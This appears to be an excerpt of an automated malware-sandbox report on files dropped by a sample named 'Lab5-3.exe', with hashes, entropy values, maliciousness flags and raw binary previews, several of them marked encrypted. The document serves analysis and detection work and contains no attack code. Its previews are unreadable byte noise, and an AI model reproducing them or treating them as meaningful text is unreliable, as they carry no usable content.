                                                                                                          SHA-512:9974D1CC113BB8E3BBFF69217452219769F0E00ADEFA851E63B8034E030FE710F4FACDA6D2C3814B90BE4DF0FD3FDA13D53A0D7CE6FFAFC9827914D9A5FC36EB
                                                                                                          Malicious:false
                                                                                                          Preview:E.z.3..].....]..s,....w.G..b..1..lMQ.QY..S....}..E....$......W..P..*.s.D....;..%m..gU...[&.E.j.<^../.`..$...F..$J".u.=.Lm..0i.D:.%(...*..v&CE:3..j~S..F ...y....U.6~M<..><...9..E.....R.B=Y..~#qL.......+{...=j..[..U9.+ . ...7T.C.\.M.K.q...................(./......R..@:.....p.d..%(......JvH..ag..].%c.D...-.,.O.."..8..p..i.Yi..r:5..e..(.H..xns........s..SdE.D:&.-.F.>....M.U...a{.&&/..`....~.%.....A.... g.R...OS...5.9O..+%w.W$FX..@9.......7......j...U..K.......v..T.j.oX.T.jjW.:.D.J..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.896621096172744
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:RB+By041taqBTnSIFHfUTid3hBaUoSGFcmeykEdEElU92i:7+Q041IkTFeGx0uKeY2ElUJ
                                                                                                          MD5:9454C39AEE6C84111031C696189F3DAF
                                                                                                          SHA1:A0D94DD5A36B8D21B9F54AF2DA6D03AB0FD44234
                                                                                                          SHA-256:A6D9669452C76A48BE1419DD9017B50522442E2305A5DDEB6B38E228FD83A908
                                                                                                          SHA-512:12A2A221FBFA38E0EC307792AAFCBE31B4E1E72D8DEC828A1DBF08DA3CCE2F4D9C7A01FCCB5C4CB97D56160E64535D23B1AEFCA64B211A2AF98B71514F318D6D
                                                                                                          Malicious:false
                                                                                                          Preview:.......h...4$.i.....\..W.....wL?.uvlS..nN..{......R@...mg..kNZ.H..W.?...HF.UM_.(t.........Bs......d9u...kH$!i.c.\...|.3W.........xs.qr.)'.6....m.F{.T~].>.8...w..sVZ.JS.V..P.2...}H.$......,......m...`.(8..z4.K....@Kj.b...Z.... ]7.*....d.I.....f..@IK.BA....w/.o...#......-E.i..... ..H...}?g..>.....s<..m.(..[]E......9.{....`..|..y...........Zy....L9N.....-4..#.T<...9...E..>..J...Y+k.PC...._..}e.s...DS.B|i.....*P......w......Y.fo.n.csj....0Ji....W|.W..k.S..*#..~..L...E`g;...!.....?...A...0'N..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2352
                                                                                                          Entropy (8bit):7.927449593509351
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:bPMBMrTuNOnmB+/YJs8mIH4jSxT1HfUTid3hBaUoSGFcmeykEdEElU92i:TMBMryNCJ8mIYjSFOGx0uKeY2ElUJ
                                                                                                          MD5:EA93FC5F96878FEBE19017284396B396
                                                                                                          SHA1:B8F82E893F6CA3CCD86F9B4D1DA02A3917F36131
                                                                                                          SHA-256:CA3C6C7BBB5E23ABD7C08DFE9A72AEC5F61B123E43D245F5BA7264B12FB4ACB0
                                                                                                          SHA-512:46BB9146FAC1857ED56B19446F9E84EF308E9877EECA937EF12CB49F6F4B9D289005D2BE7E7BC0BD0331CB60875FD95CDF1D6C53EF2B406609630D70FACCFA3F
                                                                                                          Malicious:false
                                                                                                          Preview:....i.J.........u.../c..=W...:.0.vz.zs.!M.Z...Z..,....1..Y..>...u..~....._...SB..@.....s.......S....U.m..5.n....}.P.....*=.....I..<.:.....a.#=...^...*g..r....x.>.'v."].2....|......M..2..Ol...H....*..x.._-!w..F.LT....e..Ww..7`......"M.W..YG..q*..?.o....s:i.p.x........,`..H.'...,W.Kb..v.l.(J.t. ....t.{...!@.4..%......uf.M.....e:}v#{UV6.$H<....ix[.....;.....kX...y.l.&L7.)...'.....s...s.e.J..y....=.|...r....Q.f..R.E..$s..I.L..=...yf..L..Y.6.J...!.e..r...<,y.JBB....C.SC&..487.&....^(..3.B...".s2..|W.N.z...2...p.<.K....^.~C&....*..o..........:.>`....Er.7.*.4b.G..).v.E..n.pC`.c.3[.....s.f.n.#.vpz..fd..:0.........?........La..`..P.I%36_...m.....O}...i0.....r.d.l..3..$.....@.....i..m.[......3...X.j....z8.....u.<...._..........u8y.G..G.h.Y~o.).......'....d..q..C...T..@.7J...d]4B...vk.....N._.H(N..b.V.*B..:O..o/.UnxY....%...-....f....$.3.<.+.......h...;....."6 ...3o.;..#..7..H......M..r.cF..X+.z...r...X....OD.VVE@...9l.s"../m....&...^.k.YQ.f\....r..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):22256
                                                                                                          Entropy (8bit):7.99010581534126
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:cV85z+aArIGNgpQs3a03uYhzfCb+xV+In4Ev1OqyRwZgfUu+G7I3IKzttb:c8MNRS13uVyP+In4BzwZg8u+/3LtZ
                                                                                                          MD5:08DA552F147D10BD730F8CDB45125A85
                                                                                                          SHA1:A6E7C45902CC46D9F0EEFD8AECF6B9D63599CA0E
                                                                                                          SHA-256:2F8EE56D9A1EFFDFA3CFBCB574AF4A60C1735E797D99A9D9ACCC496C3C466010
                                                                                                          SHA-512:23FDFA1CF6EC6EC1FB1E759A372A3E9DBC5289DAA5C303FB3E419BC452BDCAB0338E750CC6559000624DC4D2740A3653193528FFF01B9365F32BEDAB0A29739E
                                                                                                          Malicious:true
                                                                                                          Preview:pn]....k..q..E9..j.9;.:... |.....iJ%...K.'0.X-9>\.L/g$..o.........G:[........e...,.l.....q....6`.F... ...`*....m.!_..W...;...8.r._..M....y..}.8}...!..4....h..26..2e._....w.@_.?.7.....h..8RM...........\..Rt.......`R..# ..k...9.l...E......(..8..(..M1p...D.m....r^......G.KT...W.G...[.j;..a..*.1.g.....[S#*..d...../.k...|....5.j.3.3...-PN.M3..L-.pc'.j......ra.Zyt.t.{Bf...K=.u...x.uU.D...C..s.\....f.........4U.j....:....R....U....(3.sH..S.Z+q.g..3C.....=...%.O....0_....:E.......B.O..o.........%?.(.w/.O......L......(9......CF.j.l...'.....8_n.,......}.....h.y.......8.7...G..|..A.c.q.m..q.......A/nA..3.p...Q.......7.LW(.pX&..y.rk.KWk"....t..;..}u.x(.$.A.. ....s0@.g.1...K.....F.<.G..%.....[G...U......BPV;....m.Qj...+...*a..._..Qrtr....:'}sj.,.V..5.H#..y."..e#`.....6.....s......-J..XF.3.va0<.aL..3.=.H ].T.....jT%...&.~..$|.....8.>d~"...m.q.ZS.[(dQ.......7_........^.C..XnU..q.1...1.......(9.4c.WY.....}..z?..>.&.L.7...7...1.n.{.......U...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):601201
                                                                                                          Entropy (8bit):7.993864713986729
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:12288:TfuAKPRCETANUdWPBL62FKDZz0vSS+h5mXRO/GWOoJKXhDOLs5:TfLXUdW162FKDZzi+uhOOSCgLs5
                                                                                                          MD5:8EFF3EB74042BECAD4FA67EDB64A249A
                                                                                                          SHA1:EC1EB185CDB0A62682643B0881ECE0A893EE76ED
                                                                                                          SHA-256:B37A5FCEAD5AF937C812086E83C061FD0DB391DAEC0E6ACCAABB56EC186A7C20
                                                                                                          SHA-512:D4CAAFD383F120A88A3A25B9AEFB20DBE89AD7E18B49AE18A3AE828CED28B146AF8ED496D4C427AED8205D61A5AA7CFD95D50C8A404C4EF119142FA5F7A8668C
                                                                                                          Malicious:true
                                                                                                          Preview:.;}]....X.......<_.N.B...C.....q..t...~...x.ik.+.<.FV....n.q....qS...u....;..I.Q.^..8+.UdjT+....8...s.....O....rj.|...S.....b<..d<.e)..f.c.....x.?....2..0..A.....J........$@.C...r-m'....!#S-.U.~].N.....Jyo.....O2......cm=...U..f.*.............}..*...^....y.|.'&|..ky..`...P}.e.7G.......W.......a..2....7.ft].2..F...,.H..3K.JRV.D..Az..^b.9...Cr-x...j.c...e[g........z.K....?...7.V.Rv...p..y~.Mc...u.S.PIb..6.D....f=.A.Z1,....3..t<.p...Ca..A....T}>.......>..A_.'./...(......`.Y.P...m..`l.j..<.>.t.)M...\.+..~.sf^..VR..P.{.......a......].a".M.=...8....tz!......&l`.3g...|..N...O..f...u.7Ie%.'...].2.....5...7.3?.L...=..oToU......{.5F./..<?..8....h..-Z...b.....T8.*......`L....6.Z.)..)..A.*e{UF.r.P...Y<...tVQQ.&ie..2e.\.....D...`..j.......>.o....Hc.~'.........(.ca.=Q..puy.].p2.*O+..Y#..[L!...B..._W.7_......2.w.............^l..&7...y*..+..o.Z.7A..P.!.wT..D..83t..f...x....5.?....z....%....A..!o.R.<;..X........f....d.`D..hp.n...m.F....{.'
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.9015145362181105
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:dunYZg/w3XH3H3HfUTid3hBaUoSGFcmeykEdEElU92i:UnYL3cGx0uKeY2ElUJ
                                                                                                          MD5:00829B6E0F456D6C8529A203638CB814
                                                                                                          SHA1:CFEAD445717AEE5C4625A1766D8D6FCB6B4E73E3
                                                                                                          SHA-256:A74D90859661C3B230214C46040AC10AD00CD1E0210BD981F7491A86AA930A04
                                                                                                          SHA-512:500FEB4F3454571B3B707FCFE974DDEA6606015B166510AC0761A2C678B25E7DE8D2770AA49734D0B36B2128760085E285F6D3CB99B5775385FA158527F3A25C
                                                                                                          Malicious:false
                                                                                                          Preview:.gCf"p6.2_.5....*.o.P..`.1...].,L..8.0.\.t.1.C9..[tm.$...[...'..%gL...P..U..?...{D`P...hz6z.....Ui....J..z.^....G.5^.B.GR>....T..v...........!.7..{...<J.}.......h..2.E.h.b..=~.y....7.d](L.........\R=...&E.7>p).%...x...2....5S...q.....4 .UU.<.=8....=$..B*.|.GL..y..Y.8.!....k6.....<u.....G.*...a.....a..[K..j._d..O..B.w.w.....Q;]..H..9.k..}.h'......dr.j.N=....FK,+..14.q.]....zm.~.N..TT:!..Xm....2/..&XC0R..".M...u.....?..6~.`........T...7z.Ub.M....5>?.7.K....G'.8Dt`0.P.....C..o....q....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2352
                                                                                                          Entropy (8bit):7.918405097030619
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:L4bcNjjkuIem3KKY2U5HfUTid3hBaUoSGFcmeykEdEElU92i:LR/kJem7U6Gx0uKeY2ElUJ
                                                                                                          MD5:2437B8082C17EF4A3EC1A735BE099E6C
                                                                                                          SHA1:39173B964DAD78FC13E9DB9135C274060A18AB89
                                                                                                          SHA-256:E511AE8F22AAABFE3B1AF64C782619F71A019B07C286F8599A76A8A01618D507
                                                                                                          SHA-512:70A465F8D9B2F9042CA4409B60AAD1CC040BDD2E2001F16814868659D6362FBB07CA0C9D456585C3D7C0FF5F1794100833455C7C4479FD21271227AEAF6FF2E3
                                                                                                          Malicious:false
                                                                                                          Preview:.#.QW.,..n..-.j..Y...7o...&.w.....l..*......}.P...;Y.q~.......f#..t.T.5..).4.#~.v.R.w.<...+4B.c...F.U.....hI.x...{..e.......o..asCY.qq.rt%B`.....&.'..:9..h{.....i..s..^....1?.#..O.f.`.0....+O,..l.........\.0.".....6.1.@....z..B.t.>..$....Y@.....1..t.Q..<W."..Kp....J......h..L.6Z...c.>.8..G>.*hk.s.....tB..."&v.R...cP..qODE...b.P.?.(..MW.-.b5.x....|.i{.S......L.`..P.[...?v....{....N.l.e^8.o...uAknz..$..(@..u.D.a`IH..Ri..>.;.J.|...A.7.arT.~.x.....}t....R.=.?).6U.O.+....`#.*b...e.9....._..=....Y.4. .v.G<..3.7.[....}*.6..V........CTt .ie..L.b..Hc..i\..L/...3....vy.......Y..W|..nGHIt...@!?.x........w........>.=>.Zc.u..<SrU.+.$.^4\.z..-.uc....ab......t..\6..l.K&.#.+.F.,.w.crf....=.H.`l|8....fV...M.w89A.F......H.G..6.cLO4U.-.@k...*..x..1+L.+.`J..~.$]..M|..H\2....I.@.`....PJ..H.00...P...E....Cp|!g.#.....l......bw..v........_O.J...6..f.0.0En.Ei.g..$.mdF.|dVH....@..../44...3)j..].>'I..]LL..z........O.eXl.>.zv..M..Y..,.>... .a0P......J._.....D.!.Zg7..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10672
                                                                                                          Entropy (8bit):7.9832246724991
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Uf2Wgwc+0nzySVvWjZl0rr6jya9orjktlG9UK07w0FK7tAsR2JzZbhm0Cb:Uf2Wh0nWYOVfjyy0ktlGJUAtsJZFmtb
                                                                                                          MD5:2493C086BE448C6599071A0B768FE105
                                                                                                          SHA1:D8E27BECBA49DECB01ED9562628C13D4BF5F3C51
                                                                                                          SHA-256:034F4519708BADB326AA2F6B5BE7FC117138997F9D3942096B6CB39CC5AEB657
                                                                                                          SHA-512:B427E813D83495AB3B93C6F78C56F01514D88222FA5AAC4893563F06A0901AF06810747571305412D5C06E633C537B606A915FD0045706EA5E0E1FB06D6740BF
                                                                                                          Malicious:false
                                                                                                          Preview:vy..n.%P.s..av...(.b....qk...._...C.N..^.....+.P..0..e.8I;!...3g.Zr.nf..:>...l......A.\>FC....M......".N.t@..C=...&..l..x..d..L:.....t..9.5.(T.....9.HH4k.{.<.E..O?7.{.M-......?.a.;....`./.W.cNTt...3."..x..j...HZO.BDC.QV&}.n_.D..4.....{D[.......?...v..=.....f.F......L".\sp?..h...8.....@$Z*...JLd.?.=.nQ.I...|.y..?./S8.......w.|B.U...+@!..8..F.}.*.7.m|.].....]...k^4!..V\..?....Q..l9....=Q.qL9.}.n....,.....~.........D....AI*.n....5..u..Q.q..rp..Zu.....].AU...j...y$.].C........\.....L.pK.1|.i..D...4...~..|. ..:...?.3.Z.n~Z.J. ..YJ.|.jQ9'h./.1..f,.....v....&...|...x.F:....$....v..;..k....8X...ZI.:.;*+..Yk..1g.I...u....@..0......d[j}....o...!C...q-...a:...uH.9...).k~5,..JO../.......U./.... `*.S..MN.=/...d3...5.d.*.]..,...k7.S.N....Av.z#....A.o&(..\......i..A..r.<.z.e.t.M.j..HJ.17.>z.>j_.Al.|..dH;{T.8.V_2..~...j......S..I....bFQ.......$...D...(S..[...4....~2+..{...#b<./.T.v.E.*.zV...!...81.i.q.)................".u1...m...k...F....V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):62768
                                                                                                          Entropy (8bit):7.99755135025126
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:SNXFMc3Kju3eCaC+tXusBrGqMjiGSFZUsGIUD2Z:SN9aaP1+tesMqPcIUKZ
                                                                                                          MD5:8DA80415CF39ADE3B96639F29FB366F0
                                                                                                          SHA1:20F56101291A8EC7FA5EDA4E8791D52E84DBFAE1
                                                                                                          SHA-256:AFF3C6F0D1C0E575A3B9E10C497D31C5146767BA126DDC7F24383D7ABED699D9
                                                                                                          SHA-512:E85E83EE527BC14C97BE2BC770089172BEFD29AD38AB4A9CB668F00FC17187DA4B8BBCF436A82B962B0C3B10093B5A0FF02698D0DF252EF2EA633D97954C192A
                                                                                                          Malicious:true
                                                                                                          Preview:R%h.._..;.Z.j...;W.S..=p.~h.L^&...r.#5....8.j.8.......!V.ex7...'.....aj.."C\....%.:'..{.Lg.=..f..\_.+...E....../.{.#.......:BW.p.T..!2[..)...2Y....dD..RWh.2$d.3.aO......T.F..E.$..Zb.Rq_y..._yh..K|BP.wT83F.Z(.3.m.H.. ...<..8..L......A9x~......8[.Uz.3`.....j...u%j..u.56..h..B...>,..5Xa.P..P.....t....z4P.)._....(-.5......B...E..Xr.....U..Z...)Z.BJ.]X.:..................y..U..'."g.8.....v.h3..'.....8...L.9.Jx.....J..:w.P.V.......2...Wc`.3..k..........}.....(V.O2?.xy.d....}D\of#.Ei.,.M.+..m.+y..7...{.].....j.5\..D...L.|.._HH.'......8.>..<.a..U...8...Y...@/.L.#....y!......z`.....)...^... ..f......j..@..X.=.qP...$..d8N.~.+N.X.C0.p.E4t]......F8I./.......LC.c./.-.>:.@..r...\..f.si......P.k.8.x..A......nlDclV.]......A..p.R....H.`.1..Q.=.6.kh+.`fj.z..{.t.... ...F.I3..cY..H..aAIp.Yy....iEg...`...9....&.....n._ .5>.8y...d..:.^#<Yb.`.GJ.'C...(...1W.8..... p...*nG..Q....jQr..#.V.q.[n.y...[....`...p..U/...P.fc!U'...a...6..}m(t..]c.....P...'.,.8..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4288
                                                                                                          Entropy (8bit):7.963824712246816
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:maGX9vtRGfUD4A60PVFiNGfZGx0uKeY2ElUJ:chP4A9VFhi0Cb
                                                                                                          MD5:D392E01745E86072F6359FA7F14F8AF6
                                                                                                          SHA1:3DF484B978D2D39C3564BBC0DB97807C55BADEBA
                                                                                                          SHA-256:D3CAB41CC7EEE6ED01982B74AB28DA0B5F76241C0B4D530F2275ED33DC4234F7
                                                                                                          SHA-512:DF6057F528882B6F5C678736A8E51F1D735CE777F2593B92B2856C18D075BB045603B662D9C7D68EEE44CF6735AF57CA03863743EC04769E4CF2ABF96138620C
                                                                                                          Malicious:false
                                                                                                          Preview:kj.V..Wf..w....2j..>.X....54.../N;;..dSw.0d.:....IC.].UK.. ....Qp...N$...!..L.jwV....q.XV.6..@....L..........4`Rpi.e..6.../...(.1......c..z:.&..H.Q..a..v.<..E.....E.....`4......v.....J.......d..B.._.$....+>MT.........<[..\.......K4..1.v...nDX6"|./.p..f.......2NYf...8e..\...J.S.P.-.]......x.19.T$9dV.y.X...C.-]W.Ca....F...^1u.b$W...>E...'9*.D`...u......7..I/.`.~;(V.0...3%?\T.Z".n.e.:.....".........fBk...di..ee. .+.....~.2...=|..`..j..|!..D`.d...o.<....uv..(..KZ....,.=.......<#..#..F..b._E~<>.D"..3....z..y.y;...n7"....~..9#....M-....P.....}....(...[..s...8i......YW.t. os...*.b{...q.4......u.....y.N.^...MC.4....fGf....`T.s.D..9...5.,V.VEN...C..1T...e...hq..,P.Z.<...Mb...p.8..k..{..X%in......_<..T.y..U.;s.6.Y.S2.yh.v.7...e..1.i?%.>-......0.!^.d...5....'>...4d....i..\....g..u.+.]...NH*...C..s....V.....*.7..l....S.G\S.>.z=H)2D.G..../.\..G2....J...FL..*}.J.g...l.c.$z.../h<i...3...Gm.g.....y.>FWO..um#..m.+.._.:...i>.r...?*....a.96...;.C...i..0A.I.f.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):156128
                                                                                                          Entropy (8bit):7.998843752841527
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:gOw6+nFGdoHSQhYbq4zph1CvqeHKW4nn61kwuA7IbRePoZ:rNsGWHSWYuiCvqVWIXwuA76VZ
                                                                                                          MD5:9067205E1F6C81BAEE13A43216E993FC
                                                                                                          SHA1:4219ADBD6A32D27C00FFC492FCE9A832AC22DC9C
                                                                                                          SHA-256:CE7089476269118107C887BAE82BE75BF6EBEFF7021CCD46B186B8A45D2A8C8A
                                                                                                          SHA-512:8EFFD80DCDBD9282E610ED15B68B06D36540F55FA7611E7B295D9C29CE54495A0D40AEF8B99D8B74A50BED4E6A852902F8F3AD2AF03CF4D28261455A0BA58ED2
                                                                                                          Malicious:true
                                                                                                          Preview:S..M.-D..;.x...D...gX.`.P.:...:.!...w&...,#..`.D.......j.+Y......2:Ei?g....^z....F.~HlLz....m<!o1...=).u.F..1.F.|8.U."w\.5..!o.HI#IP.`.........g... 3...z..t[.?..YQ..+..U...(x$a.:gS.x.zV[......Y...........^...$&.....A...4.c...Cm.7....x....o..s.....y.A....5...*.=..:Y..'.w.2y..............8...G....s.&.V..;.lb...j <\..BI.yw.#....."}.qZ.D..n.@N.z..}........`a......y......9*..lYj..q.....<.q.I..&.Dn..32P;...:.._...W..z`P7v3.wSB0(p..SD.....I.ut@#..&..q......i..Z....=......G;.V;..i.Jy.......{2..,.))._.....6.B-...s..L....2.r......`.....[.._d..q..."..b\.L1....P#.C....m.<ox....... .U..A.!+.......W.......!.Q5......_.^...J}Q..{d'g....&...8.JqQ..C....|!.N..^.>..?b...@._.(xIo.nW.n^.i.K.......\...i....xy_:.@...'.r-.........D..8....R1.$h.Xae5K.......1..g...q.....3'..~.....K.......b6...r.t....O...R.."'..6%....s;..i..Lv..Z..i.s.n?....@..6..~...=.].b....U......YE+..9At..2i...q*V..^*...'....=mYTb...h.{..q...5L.F.g.....@Xf.....Xop...Kf....)na....Nd.!.$.A....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.901271484856462
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:QK9s21PK7HfUTid3hBaUoSGFcmeykEdEElU92i:Q4sdIGx0uKeY2ElUJ
                                                                                                          MD5:3CFC20584BA38F3413E202C0EA2E2ECA
                                                                                                          SHA1:8181619D71A406CC50D23A7A6984433F55681564
                                                                                                          SHA-256:2CAC8B70C9398048F155FCC1236BADF58BD1D36AF584FCCB0461DBA06A4B102C
                                                                                                          SHA-512:2FA029513BD0B9341AEF1DB0AA6869BA8F4EB9FBC177806122517D35AB2F0101B8A781B5D761212A99FE6563B8526085ADEC5F1AD8CE61BCE33B3A1B56C4DBE1
                                                                                                          Malicious:false
                                                                                                          Preview:.e....$..{6.W<.\.HC_.s........q{...KE...6M...2.,.2.j.....$.w....t.3..`.Aj..Q...i.2D...V.T.h2I.0..L...]...a....Vw.Dj......g..}.P.....k..>J..L.m._......q?Y1y}ulg@]..<.f...g..K..I.?Q../>.....*.K.2P+.....g.:...N...WP...E.GB.../B.d.g...b..F.X.Cy).Jk..YL.b.Nk-q...^.......V...M......CK....C.R".r..~x......m.p.........G.A"..(.....%.X...V..|g.....h..X.8L.y.gx.... .0.-..1..`..!N..'...$ .. ^>....m.V@gB.....U.D.J.-ve+.Tq.^%E.}..6.......~....[....._.H...1(.h3...u.............1v..zBX..T...s......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):314718
                                                                                                          Entropy (8bit):7.992129292700078
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:/5wJ+s5nAuWuTx4akiNmSMuzywuvxC18eJzvYGTpXl96X4Qwi+pSzkW0nZ:xwBFA1iNmSMuzywQxCHTp1an+pZDZ
                                                                                                          MD5:BC16F48678F281D0C2A3E5DF7B85A88A
                                                                                                          SHA1:10786EEFE67314970998333DC44FCF94068FE5ED
                                                                                                          SHA-256:F44E6AEC9022239BFD3407CD07B3759D0E96F63A98100B2970E0370CE416FAFA
                                                                                                          SHA-512:86027B602D1B7B84731F5C526C09DE6A240ED0C091DA76EC0FE67CAC2023050444C866650A2AD4D1361162329E4E6AECBCADE600E7CA5A952B98F89C5607A46C
                                                                                                          Malicious:true
                                                                                                          Preview:.....~<.T.t.Kg.....^8...\..H>..r!.Rn......j.k...:..;..*...........&..G.C.g.. ..[(..b...b.I.u=.......XI!KK.$....o......CHt.I\......r..o.?e....H.r...u....@7..9.D........z.)o!..b.8...v.1.N.k....@(..;}.E...FC..^.U...6K...../..'.......P!. _.J.>.$..m......I..{..(...p..Q..R.p.".......z.v....D...D......n.......%...-+....l.&....w:.ovI......._....p.....9c.."7lAA??........"E....ix.t.|.0.^j.0.l...~b........s."E)3...W....A....uoV....ggU.o....J....J*=N....*B.~.j....Q.j.A'X..Cn..kR....Xu~!7...B.q..i.n...VI..9...v{#...c.6.)...7*.....F..*..Q..T8FC.d.I.w......(..c...3.'.{6.k...k.....$.........A{qc..EI.%...&.#m.un.9/a.GX..5..^...Um.....sK...^..%.J...-.U.. ........yPDw..}\d.9...H.N.<(....3.6.......B..]Y....M....M....u..e"~.jt...f.})J..H@....g..Y.c.....b.7...}.^.....k...u.......o...N..X......0....O..-5.-0.y...k~S.k....;....Q......9....v..R..."....R...Cf...a..N...9I>X..m.;J..g].......O.zs...oH.r"......2.P.t....G..8.}......!..X?p"v..Z.Q"p..IC....%
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.884789861201836
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9i9b3+VClAHfUTid3hBaUoSGFcmeykEdEElU92i:+3qyHGx0uKeY2ElUJ
                                                                                                          MD5:9EFB0224CFB09D94093FF21E97C7EC0B
                                                                                                          SHA1:C7976DC55626BCF25B8AC9F6EA5917314FFB2C16
                                                                                                          SHA-256:021A6145C6F325C676308BCB7A95A20CDE864953FBE96CE13BAC1FDAA56E0D09
                                                                                                          SHA-512:58177106D2656B43C0D788C031FE81282928A6E25E700FB037C4C2D7BDE2B0C8CCA2EFE84642982DEDB1D9DEA19E17DA6DF6ADC8D114B387112FF783CD8BEBB3
                                                                                                          Malicious:false
                                                                                                          Preview:..O...D..@:.n..b..!-<.HJK>.V-VE..l...F..2.Zx....t..g..........J...O...!..\_..7Xr.m.?.........^B...E*..`....(..o?."...g.tx.A.....i..e.Z~./w.A..n.../...q"o...wk.~...(......|.f.u..gl..G.zt$.jR'....d~./..3p...1...}.+D{..........a .1C.q.0.m....9E.=3..A.z....(..+...(...0..~....0..!...r...A.s....o.'...Gr.C.I7.D..HO.....j<..'.o!.bU...d.se........a&.Q.3.|.k.A.C(L....`..oM.Wq..rp......m.....;.A|#..L6.....97........./y...../L....?....lQ....V.....<Sr.Y.%..I_]..p.e.Q........K U8.Q.Y..D......r.PG8>........^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):131760
                                                                                                          Entropy (8bit):7.998739676016249
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:mJC4stmZCm1VG+unKZ5fVVWLfSd7+cKw/e0/Rv2DGjQJ87K54Z:P4ZInKDw1GRt2ijI8724Z
